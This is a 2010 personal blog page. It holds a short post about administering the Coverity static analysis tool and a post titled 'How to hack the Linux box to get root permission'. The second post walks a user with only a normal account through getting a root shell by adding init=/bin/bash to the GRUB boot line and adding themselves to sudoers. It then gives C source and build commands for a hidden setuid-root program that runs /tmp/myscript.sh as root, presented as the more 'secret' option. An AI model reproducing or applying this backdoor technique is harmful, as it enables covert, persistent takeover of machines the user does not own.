Friday, June 25, 2010

coverity

I am recently working on the Coverity Prevent product, which is a static source code analysis tool to identify possible bugs in the source code.  The tool is pretty cool, originally developed in Stanford University. It's gaining a lot of momentum recently with mature products and backed by VC.  Looks like many big companies are jumping onto the board of Coverity.  It's a promising tool.  But I think the final fate of the company or the best deal would be sold to big software companies like Microsoft or Symantec.  Anyway, it's a good tool and I am the administrator of the tool in my department of Ericsson Canada.


--
Hao Leo Chen
http://leochen.net

Friday, June 18, 2010

How to hack the Linux box to get root permission

You have a Linux box with you, but you have only a normal user account.  You want to hack this box and get root permission.  Now, you have a solution.

Note. the following procedure works only when you use Grub boot loader. Never tested with Lilo.

1. reboot your machine
2. before boot to Linux, press some key to bring up your boot loader interface
3. press "e" to edit your boot loader line, in Grub
4. add "init=/bin/bash", or "init=/bin/sh" to the end of your booting line
5. press Enter and then press "b" to boot
6. your system booted and you are root now, without login
7. Bingo.  You can hijack the system now. :-)
8. To be a good citizen, I would recommend to add  your own user id into the /etc/sudoers file, by using "visudo" command.
you can "sudo bash" to get a shell with root permission.  You don't know the root password yet, but you can get the root permission. But this way, the root will know it's you who hacked the system by checking the "/etc/sudoers" file.
9. To do something more secret, you can get a suid program executing your script as root.

I have got a C program, you may build it and set the suid.

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main()
{
   setuid(0);
   system("/tmp/myscript.sh");

   return 0;
}

10. save the program as t.c
11. gcc -o go t.c
12. chmod 4755 go

Now, you can put anything you want in /tmp/myscript.sh and run go. The /tmp/myscript.sh will be executed as root by go. Wow!

Don't do anything stupid to get  yourself into trouble. Just a demonstration of some hacking technique on Linux system.